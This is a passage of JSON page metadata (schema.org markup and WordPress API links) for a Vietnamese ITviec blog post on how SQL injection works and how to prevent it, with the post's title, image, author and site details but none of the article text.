Kh\u00e1m ph\u00e1 c\u00e1ch ph\u00e1t hi\u1ec7n, ph\u00e2n lo\u1ea1i v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi SQL Injection.","breadcrumb":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/itviec.com\/blog\/sql-injection-la-gi\/"]}]},{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","width":1500,"height":790,"caption":"SQL Injection l\u00e0 g\u00ec - itviec blog"},{"@type":"BreadcrumbList","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Chuy\u00ean m\u00f4n IT","item":"https:\/\/itviec.com\/blog\/chuyen-mon-it\/"},{"@type":"ListItem","position":2,"name":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi"}]},{"@type":"WebSite","@id":"https:\/\/itviec.com\/blog\/#website","url":"https:\/\/itviec.com\/blog\/","name":"ITviec Blog","description":"IT Jobs &amp; People in 
Vietnam","publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/itviec.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"vi"},{"@type":"Organization","@id":"https:\/\/itviec.com\/blog\/#organization","name":"ITviec","url":"https:\/\/itviec.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","width":1800,"height":1800,"caption":"ITviec"},"image":{"@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/ITviec","https:\/\/x.com\/ITviec","https:\/\/www.linkedin.com\/company\/itviec","https:\/\/www.youtube.com\/channel\/UCYthAQ3bcGr57M_ag5gHDvQ"]},{"@type":"Person","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7","name":"M\u1ef9 Duy\u00ean","image":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","caption":"M\u1ef9 
Duy\u00ean"},"url":"https:\/\/itviec.com\/blog\/author\/my-duyen\/"}]}},"_links":{"self":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/82168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/users\/209"}],"replies":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/comments?post=82168"}],"version-history":[{"count":0,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/82168\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media\/82229"}],"wp:attachment":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media?parent=82168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/categories?post=82168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/tags?post=82168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}